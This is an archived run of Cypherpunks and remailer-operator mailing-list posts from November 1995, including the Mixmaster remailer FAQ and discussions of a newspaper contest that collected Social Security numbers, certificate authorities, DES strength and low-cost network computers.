>kill it. This is one potential advantage we have over the spooks.
>
>It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
>Gutmann, and others have proved themselves quit capable of writing good
>solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
>Dan Bernstein, and some others (who I'm not sure want to be named) are
>talking to the government. GUI I'm less sure about, but I'd hope that some
>cpunks would come out of the woodwork.
>
>It is not a matter of ability, but of will.

It is also a matter of funding of course. While development can be donated
time, the rest often takes money. Still, its something to look into.
Handling RSAREF is sapping much of my time, otherwise I'd jump right in,
however I like to always pause before committing my time to endeavors. I
wouldn't mind helping out though. Certainly Consensus probably has some
resources with its own contacts to contribute.

I agree with your points though. Another thing to consider, are some
alternate methods of enterprise design that involve better communication,
iteration of goals vs product, etc. (Actually I need to work on a speech
about this that is coming up soon. Yet another project. :)

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 28 Nov 1995 03:32:41 +0800
To: cypherpunks@toad.com
Subject: re: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <Pine.BSD/.3.91.951127135434.7490A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


"Lynne L. Harrison" <lharrison@mhv.net>:
>  There may be *an ulterior motive* of getting the person's ssn, i.e., for
>the purpose of the newspaper (and the winner) reporting winnings to IRS.  In
>addition, the newspaper may also feel that, in selecting a 10-digit number,
>it probably will not repeat such as someone's birthdate.  Personally, I lean
>towards the former.

Why not just make giving up your SS# a condition of receiving
the prize *if* you are a winner like lotteries do?  I think the real 
reason is they need a unique number and are lazy and uncreative about 
generating one from the info people send in.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 28 Nov 1995 04:34:44 +0800
To: alex@proust.suba.com (Alex Strasheim)
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID: <199511272026.PAA11253@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim wrote:

| The Chicago Sun-Times is running a contest in which readers are asked to
| send in their social security numbers.  Someone will win a cash prize
| after a random drawing. 

	Sounds like a prime time to misremember your social security
number.  Alternately, transpose digits, make 6's and
8's indistinguishable, etc.  Don't see it as oppression; see it as a
prime chance to monkeywrench another database.

Adam '119 36 3801'

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 28 Nov 1995 06:34:56 +0800
To: remailer-operators@c2.org
Subject: New Mixmaster
Message-ID: <199511272220.QAA28147@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Lance's new Mixmaster 2.0.3 is also available on vishnu.alias.net via
the normal methods.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLo5iaghiWHnUu4JAQGTogf/XdW+U3MPg668h7oofd2IYkP4dQNv8m3r
TUTKnmUuQP6JqJV2Y2QC9oF2A6VobNC7Q1EP3s6xbMIP8a20hMsvvJbWYRDfIBWH
ydTBGMk8JZvDXHVlok5eVD99Krrl51pQskWjxBuZKJMTZSTL7TmJYxX+JHWFViAh
qPOVOImZfyKlInra36EHO1M7bptMjc0pwEQQ6tOrnPbBzlUYLm/xWtWXyvXjH7QJ
WxAiLHTS55Y3UMhTBoqMtOViWXOaW8nY14mzEnN2B2byoXMiSsDWGhpr0wWDJ5CC
oYWQWZPyHB0H6T5MWNT95/GO7wxfxj3+nx1MyPKcjg8efShwWEOVfg==
=d6hk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zuhn@sctc.com (david d `zoo' zuhn)
Date: Tue, 28 Nov 1995 06:39:36 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d0aacdfe235b0b7@[157.22.240.13]>
Message-ID: <199511272224.QAA20539@spirit.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


I would posit that any "Cypherpunks" group arranged to "write the software
for privacy" would rapidly get bogged down in the sorts of problems that
Raph mentioned, as well as a host of others.  The inter-person politics of
the free software groups on the Internet are amazing (and something I like
to avoid these days).

On the technical side, what piece of software do we need for privacy? 
Well, anonymizing WWW re-servers.  Better interfaces to secure mail. 
Better interfaces to the anonymous remailers.  Remailer-as-delivery (e.g,
mailing a delivery ticket which the recipient would have to use in order
to get the message from the remailer).  IPsec.  Reputation & certification
systems.  Inter-site encryption.  The list goes on (and on).

And then what platform do you aim for?  

I see the value of the cypherpunks list as a meeting point for a wide
variety of folks, each of whom is likely to go off to do work in their own
area, with new perspective on the values of privacy.

The value of the list as a conjunction of pro-privacy folks is much
greater than it's value as a list where implementation of some application
can be coordinated.   If nothing else, the amount of work to be done is
greater than that doable even if every member of the list sat down to
write code full-time.
Not that we couldn't get amazing things done, but...

ObSpoilsporting over.  Go for it, and best of luck to you.

-- 
david d `zoo' zuhn   ---  secure computing corporation
zuhn@sctc.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joey Grasty X3697 P6611 <jgrasty@pts.mot.com>
Date: Tue, 28 Nov 1995 06:36:00 +0800
To: cypherpunks@toad.com
Subject: Judge won't drop Netcom from suit
Message-ID: <30BA3798.2781E494@pts.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out the story on the Scientology suit. 

http://www.sjmercury.com/scie1127.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Tue, 28 Nov 1995 10:56:05 +0800
To: c2.org.mix-l@jpunix.com
Subject: Mixmaster Remailer FAQ
Message-ID: <199511280121.RAA05114@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Frequently Asked Questions about Mixmaster Remailers
FAQ Verson 1.7 Nov 27 1995
by Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers.
I wrote this to answer questions often asked by new users of Mixmaster,
and to explain why you would want to use Mixmaster remailers.
At the end of this FAQ is a list of currently active Mixmaster remailers.


**Announcements**

I am pleased to announce the release of Mixmaster 2.0.3
It contains many bug fixes, and a much improved Makefile which
makes compiling a snap!


**What is Mixmaster?**

Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list.
Mixmaster is the next generation in the evolution of remailer technology.


**What is an anonymous remailer?**

Quoting from Andre Bacard's remailer FAQ:

  An anonymous remailer (also called an "anonymous server")
  is a free computer service that privatizes your e-mail.
  A remailer allows you to send electronic mail to a Usenet
  news group or to a person without the recipient knowing
  your name or your e-mail address.

For a non-technical introduction to remailers (not including Mixmaster),
I recommend Andre's FAQ. It is posted regularly to:
  alt.privacy
  alt.privacy.anon-server
  alt.anonymous

or you can get it by sending mail to:
  To: abacard@well.com
  Subject: Help1
  Message: [Ignored]

There is also a version on the World Wide Web.
<http://www.well.com/user/abacard/remail.html>


**What do I need to use Mixmaster remailers?**

Unlike other remailers, you can't just make your own message and send it
to the remailer. Mixmaster's security comes in part from using a special
message format. The disadvantage of this is that you need a special 
program to make the message for you. Once you have that program 
(the client) remailing is as easy as running the program, and telling it
which remailers you want to use.


**How do I get the Mixmaster client software?**

There are two sites for distribution. The first is my machine,
http://obscura.com/~loki/Welcome.html/
or ftp to obscura.com and read /pub/remail/README.no-export.
The other is by anonymous ftp to jpunix.com.

You will have to follow the instructions there to get Mixmaster.
Because Mixmaster contains cryptography, it may not be exported 
from the U.S and Canada. The reason for the circuitous route to download
Mixmaster is to show my good faith efforts to keep Mixmaster from being
exported. I have heard rumors that someone has already broken this law,
and that Mixmaster is available from Europe. I do not approve of this
and will not support that site.


**How do I get the software to run a Mixmaster remailer?**

The remailer software is available from the same sites as the client.


**But I only see one Mixmaster distribution?**

The same program is used for both the client and the remailer. The only
difference is in the installation. For the client you just compile it
and you are ready to go. For the remailer, you need to set up mail
forwarding and cron jobs.


**What kinds of computers does Mixmaster run on?**

Unfortunately, not PCs or Macs. But it is being ported to those right now.
Mixmaster runs under UNIX. The only machine it is known not to work on
is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3,
Solaris, and several others. It has been compiled and tested on Netcom. 
If you use it on a machine or service not on this list, please let me 
know so I can add it.


**How does Mixmaster work, and why should I use it?**

You should use Mixmaster if you want the highest level of anonymity
available, or if your are tired of building remailer messages your self.
A discussion of how Mixmaster provides this level of security is beyond
the scope of this FAQ, but I put an essay on the subject on my home page.


**Does Mixmaster use PGP?**

No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own
keys and key file formats. To add a key to a key ring, simply append 
the key to your key file using your favorite text editor.


**Can Mixmaster post to News?**

Yes, like older remailers some Mixmaster remailers can post to news.
Also like older remailers, not all Mixmaster remailers can post
to news. Request the remailer's help file to check if it supports
posting. Do this by sending mail to the remailer with the subject line 
	remailer-help.
 

**When Was Mixmaster Released?**

Mixmaster was originally released on an experimental basis in late
1994. There were only ever two remailers running Mixmaster 1.0.
Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly
available Mixmaster remailers.


**What is the latest version of Mixmaster?**

Version 2.0.3 was released on Nov 27, 1995. This version uses a new
Makefile, which makes compiling it a snap. Several bugs were also fixed,
and some esoteric functions added.

Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can
now accept messages containing multiple Mixmaster packets. Mixmaster
can be told to choose a random set of remailers to chain your message
through. It will now route multiple packet messages over independant
chains. Several minor bugs were fixed.

Version 2.0.1 was released on May 27, 1995. The only changes from 2.0
are some improvements in the documentation, and the inclusion of a 
more up to date list of remailers.


**What remailers run Mixmaster?**

The most recent list of remailers is available on my homepage,
along with the remailer list and key file for Mixmaster. You can simply
replace your old files with the ones from my site to keep up to date.
They are also available by ftp.

Here is the current list of Mixmaster remailers. Send mail to the
remailer with the subject remailer-key to retrieve the remailers
Mixmaster key.

   mix         mixmaster@obscura.com
   vishnu      mixmaster@vishnu.alias.net
   knight      mixmaster@aldebaran.armory.com
   robomix     robo@c2.org
   syrinx      syrinx@c2.org
   replay      remailer@replay.com
   hacktic     remailer@utopia.hacktic.nl
   crynwr      remailer@crynwr.com
   spook       remailer@spook.alias.net
   flame       remailer@flame.alias.net
   Armadillo   remailer@armadillo.com
   anon        mixmaster@anon.alias.net
   secrets     secret@secret.alias.net
   wmono       wmono@valhalla.phoenix.net
   ecafe-mix   mixmaster@remail.ecafe.org
   aD          anon@ad.org
   shinobi     remailer@shinobi.alias.net
   amnesia     amnesia@chardos.connix.com
   q           q@c2.org
   precipice   mixmaster@mix.precipice.com

Since this is a new FAQ, I am sure it is far from comprehensive. Watch
this space for changes to the FAQ. It will be evolving rapidly for a
while. Please send any questions you think should be here to:

Lance Cottrell <loki@obscura.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLoU3FVkk3dax7hlAQElGgP+NgE9z/sX402DN2pN9CZ5GKDLNdglEPIM
Wz52Zone7hmd1w76VFwb7RSl1uCZxVekJIb1KnPNNXmWX5fmQYMj77ucyjInmkYe
9GVnWL6SjmKmagXppyeatvOMYDt+FtolZU0hisvRS5A+LwnX95IJhiAdZkXjba//
CYC3uMqd21k=
=64iE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Tue, 28 Nov 1995 07:14:00 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d08acdfd6f40be1@[157.22.240.13]>
Message-ID: <9511272256.AA13473@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


One more time for the security/cypher-impared (me at least).

I suspect there are a fair number of lurkers here who code for a living
and would be willing to contribute if someone/the_group can articulate
a requirements statement and then push it to the design stage.

I bring nothing cypher-wise. I would be willing to help walk the
s/w-engineering dog and to write Motif/X/socket if the chosen platform
is UN*X, however.

So, from an engineering standpoint, what should the "future" look
like?

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Tue, 28 Nov 1995 00:37:11 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <Pine.SOL.3.91.951127180832.25120B-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, Jeff Weinstein wrote:

> Alex Strasheim wrote:
> > 
> > > Basicly when the browser finds a new CA that it does know about it promts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> > 
> > Is anyone running an ssl web server that would let us see how this works?
> 
>   A little bird pointed me toward https://www.secret.org.  I have no
> idea who they are...

Another way to see the dialog boxes is to delete one of the CA's that 
came with Netscape Navigator and then connect to for example 
https://www.netscape.com/

What software there is available (preferably non-commercial) to become a 
CA? Is for example the SSLeay package enough?


Jri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 28 Nov 1995 09:42:17 +0800
To: cypherpunks@toad.com
Subject: Meeting: Austin, TX
Message-ID: <199511280130.TAA00326@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The Austin Cypherpunks will be meeting this Saturday from 6-8pm at Ted's
Greek Restaurant on Congress between 4th and 5th. We will be taking the
tables in the rear.

The main topic of discussion will be the proposed 1 hour public access video
on cryptography. Also we will be discussing making some form of monthly
key-signing.

Hope to see you there!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 28 Nov 1995 09:48:45 +0800
To: remailer-operators@c2.org
Subject: The corrected Mixmaster
Message-ID: <199511280131.TAA02826@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The corrected mixmaster 2.0.3 is also available on vishnu.alias.net
via the normal methods. I apologize for any inconvenience.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLpmXlOTpEThrthvAQFpSQP/euSY5hvIvSwRMZuiOEx9j6IER5k2rDEc
6rfNEccIP95YtGcDJ70lLbuTq4sHjrKYe2vyz9OpMn48mQEVfjcs/JFSt4xfpU8s
hpK2a4HvWACBa/J9TKlgtEuXCrAkBoROkn6pVsV4hAqwDhM6oNuDaEk+93KVl/wn
dJ/5+gqSiYY=
=0EGC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Tue, 28 Nov 1995 16:33:19 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Terminals
Message-ID: <v03003d01ace034532775@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate sez:
>Forwarded message:
>
>> Subject: Re: The future will be easy to use
>> From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
>> Date: Mon, 27 Nov 95 21:28:05 EST
>>
>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this weeks PC Week or Mac Week, as they both
>have several articles discussing this. Bottem line is that the under $1000
>computer seems to have no future either in industry or the home.
>
I agree and disagree. ;-)

The "internet terminal", or "internet appliance", as it is sometimes called,
is IMHO, worthless. Would you write and send e-mail if you had no way of
archiving it? Would you use "net-quicken", if it required all your data to
be stored on a shared disk at Intuit? (There was an interview on NPR 11/17
where this was touted as "the next big thing"!)

On the other hand, I believe that a <$1000 computer would be a big seller.
>From a marketing point of view, there's just something about a price tag
with three digits left of the decimal point, even if they're all nines :-)
The tough part is making it usable, and making some money on it.
[ I've got this 386-40, with 1 MB RAM and a 40MB hd, see... ]


>Realisticaly, who in their right mind would buy a diskless workstation to
>connect to Internet?
>
No one.

>You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>
Actually, I think the plan is to boot from ROM.

>Anyone who bases their business on this technology won't have a business.
>
I agree.


-- Marshall

Marshall Clow	              Aladdin Systems
mclow@mailhost2.csusm.edu

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 28 Nov 1995 10:16:13 +0800
To: remailer-operators@c2.org
Subject: key changes for secret.alias.net
Message-ID: <199511280159.TAA03326@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello everyone,

	secret.alias.net suffered a key change when installing the new
Mixmaster code. Be sure to get the new key from vishnu.alias.net via
http://vishnu.alias.net/pubring.mix.html and type2.list.html. It's also
available by ftp from vishnu.alias.net.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLps86ghiWHnUu4JAQGY/Af9F6L6wt5CCHyOEIBB41vx4Pg4qs8iUELH
L+iQRnSpbhRdh+WCWltsk4vvzBVJQKd0n6n8qb6Lt/5p2DTg5nNRKrkmBeAQ4Y5i
7L81IIE8cM+3dmHy3LzTSwhuBtO0P46NDjNHcZ1cViZt8x1Rjsz2/wfYNgh9jyV5
ENfBZ931Vhx+ne8oge83kbs/y0v2K1Kwk7Tr+cIQ/jMV1vPu9roxfARSSwULTTBa
VjqtqFkqDAu+XyOuL2yGuoBiusUjwuQMVROCODhQ9PqVw1S/cnvwz+SucGqtcL74
9zPj6f4aYDzRweT0jkASBlwfj8JBaGxS32HpoudVtU8y5/Nsus9eOg==
=Zx6V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 28 Nov 1995 12:31:23 +0800
To: cypherpunks@toad.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <199511280404.UAA03020@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


>  I am curious on whether there are any applications of the directed
> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
> reaosn for asking is that I've come across something in my field (molecular
> genetics) that can be used to solve such problems in a couple of weeks or so.
>  -Allen
> 
> 
Secret sharing can be done by Hamiltonian paths.  No public key code has been
found to take advantage of those, or any other NP complete problem, so far as
I know.  DNA computing really doesn't solve the Hamiltonian graph problem, it
just makes the biggest one that you can solve a little bit bigger.  500 point
graphs remain insoluble (pun unitended) for earth-sized vats of DNA. 

Really.

-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 Nov 1995 09:24:48 +0800
To: cypherpunks@toad.com
Subject: Cyberangels vs Anonymnity
Message-ID: <01HY5FBP59SG8WYPHF@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's the section from the Cyberangel FAQ which should explain why
I put the addresses on the list. Given that their main tactic so far is telling
ISPs, I would guess that any unauthorized remailers may be in trouble... once
they get a clue enough to spot them. Yes, the shouting is theirs.
	-Allen

  _9) WHAT KINDS OF CHANGES WOULD THE GUARDIAN ANGELS / CYBERANGELS LIKE TO
  SEE?_
  
  
  A) WE WOULD LIKE TO SEE AN IMPROVEMENT IN USER IDENTIFICATION. USER ID IS
  IMPOSSIBLE TO VERIFY OR TRACE BACK. THE VERY ANONYMITY OF USERS IS ITSELF
  CAUSING AN INCREASE IN RUDENESS, SEXUAL ABUSE, FLAMING, AND CRIMES LIKE
  PEDOPHILE ACTIVITY. WE THE NET USERS MUST TAKE RESPONSIBILITY FOR THE PROBLEM
  OURSELVES. ONE OF OUR DEMANDS IS FOR MORE ACCOUNTABLE USER IDS ON THE NET.
  WHEN PEOPLE ARE ANONYMOUS THEY ARE ALSO FREE TO BE CRIMINALS. IN A RIOT YOU
  SEE RIOTERS WEARING MASKS TO DISGUISE THEIR TRUE IDENTITY. THE SAME THING IS
  HAPPENING ONLINE. WE WOULD LIKE TO SEE USER ID MUCH MORE THOROUGHLY CHECKED
  BY INTERNET SERVICE PROVIDERS.
    ________________________________________________________________________
  
  CYBERANGELS         EMAIL ADDRESS: ANGELS@WAVENET.COM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Tue, 28 Nov 1995 10:54:32 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511271952.LAA26633@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951127201852.6314C-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 27 Nov 1995, Bill Stewart wrote:

> Signatures often have known, or easily guessed, plaintext in them,
> like the signer's name or ID number, or various header fields
> such as X.509's equivalent to ----- BEGIN PGP ....

  If the signature is padded with random junk on the end, then it makes 
it harder to do a known text attack.  There was a message a few days ago 
by Anderson and someone else (in England) that dealt with weaknesses in 
some encryption protocols.  It was good to read.

> DES isn't worthless.  It's a bit weak, but not worthless.

  Even though he didn't have proof Bruce Schneier stated in "Applied 
Cryptography 2nd Ed" that the NSA might have a machine that can crack DES 
in 15 mins, and maybe as low as 3-5, as one was built and sold.  The book 
can explain it more, as I am doing this from memory.
  Take care and have fun.
 
==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Tue, 28 Nov 1995 09:54:55 +0800
To: "Jack P. Starrantino" <jps@monad.semcor.com>
Subject: Re: The future will be easy to use
In-Reply-To: <9511272256.AA13473@monad.semcor.com>
Message-ID: <Pine.SUN.3.91.951127203639.6314F-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 27 Nov 1995, Jack P. Starrantino wrote:

> I suspect there are a fair number of lurkers here who code for a living
> and would be willing to contribute if someone/the_group can articulate
> a requirements statement and then push it to the design stage.

  As soon as PGP 3.0 is released I am planning on incorporating PGP into 
Pine, and start putting it into more programs, to increase the usage of 
encryption things before they go out.
  I am planning on adding a chat ability to a browser, and hopefully that 
will be encrypted, as well.
  Take care and have fun. (from a lurker)

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 10:01:45 +0800
To: cypherpunks@toad.com
Subject: Re: Cray's New T3E
In-Reply-To: <199511280140.CAA25757@utopia.hacktic.nl>
Message-ID: <199511280146.UAA11393@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Couldn't you have just posted a pointer to this instead? Yes, we know
faster computers are being built. Its not cypto-relevant,
though. Sure, the NSA will buy some, but that is hardly news or
interesting.

Anonymous writes:
> WSJ, Nov 27, 1995
> 
> Cray Research to Unveil 2nd-Generation Parallel Processor
> for Technical Market
> 
> By William M. Bulkley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 28 Nov 1995 11:01:56 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <199511280254.UAA00156@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: The future will be easy to use
> From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
> Date: Mon, 27 Nov 95 21:28:05 EST
> 
> One thing that David didn't mention is security add-ons to the "network
> computers" that are supposed to be rolled out within the next few months --
> the successors to X terminals, $500 boxes with a good screen/sound,
> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
> I expect some folks to make a good living by writing add-ons (including
> crypto add-ons) to these gizmos.
> 

Don't hold your breath. The current market surveys say that there is no
market for them. Check out this weeks PC Week or Mac Week, as they both
have several articles discussing this. Bottem line is that the under $1000
computer seems to have no future either in industry or the home.

Realisticaly, who in their right mind would buy a diskless workstation to
connect to Internet? You certainly wouldn't do crypto on it because it has
to boot from somewhere else and this leaves all kinds of security holes.
Also, there is the fact that at the current time there are no generaly
useable apps on Internet beyond the web and most companies would rather have
their employees doeing something more productive than hanging ten.

Anyone who bases their business on this technology won't have a business.

Take care.

                                         Jim Choate
                                         CyberTects
                                         ravage@einstein.ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 Nov 1995 10:28:55 +0800
To: cypherpunks@toad.com
Subject: Directed Hamiltonian Path Problem
Message-ID: <01HY5GZFNPQO8WYPHF@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I am curious on whether there are any applications of the directed
Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
reaosn for asking is that I've come across something in my field (molecular
genetics) that can be used to solve such problems in a couple of weeks or so.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 28 Nov 1995 04:39:16 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <9511272025.AA16830@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
 > > Is anyone running an ssl web server that would let us see how this works?
 > 
 >   A little bird pointed me toward https://www.secret.org.  I have no
 > idea who they are...
For those that want to know what's there without wasting their time
'upgrading' to netscape 2.x,etc.... 
There is (currently?) very little, the only thing interesting I found
is that 'they' claim to give away free CA if you mail at
<ca@secret.org> (their 'Project7'/'666 Crypto' route...)

Regards

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Marxist SEAL Team 6 jihad break mururoa explosion smuggle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 28 Nov 1995 12:15:35 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <199511280309.WAA10578@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by ravage@einstein.ssz.com (Jim Choate) on 
Mon, 27 Nov  8:54 PM


>Don't hold your breath. The current market surveys say 
>that there is no  market for them. Check out this weeks 
>PC Week or Mac Week, as they both  have several 
>articles discussing this. Bottem line is that the under 
>$1000  computer seems to have no future either in 
>industry or the home.


Peter Lewis reports in today's NYT on "doubts about the fantasy 
of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, 
"They will exist and they will be very successful, and not just 
from Sun and Oracle. The price points are going to be pretty 
low, and they'll look more like consumer electronics."


Anybody want this mixed review send us a BOX_top.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 28 Nov 1995 14:31:04 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <v01530506ace05744708d@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
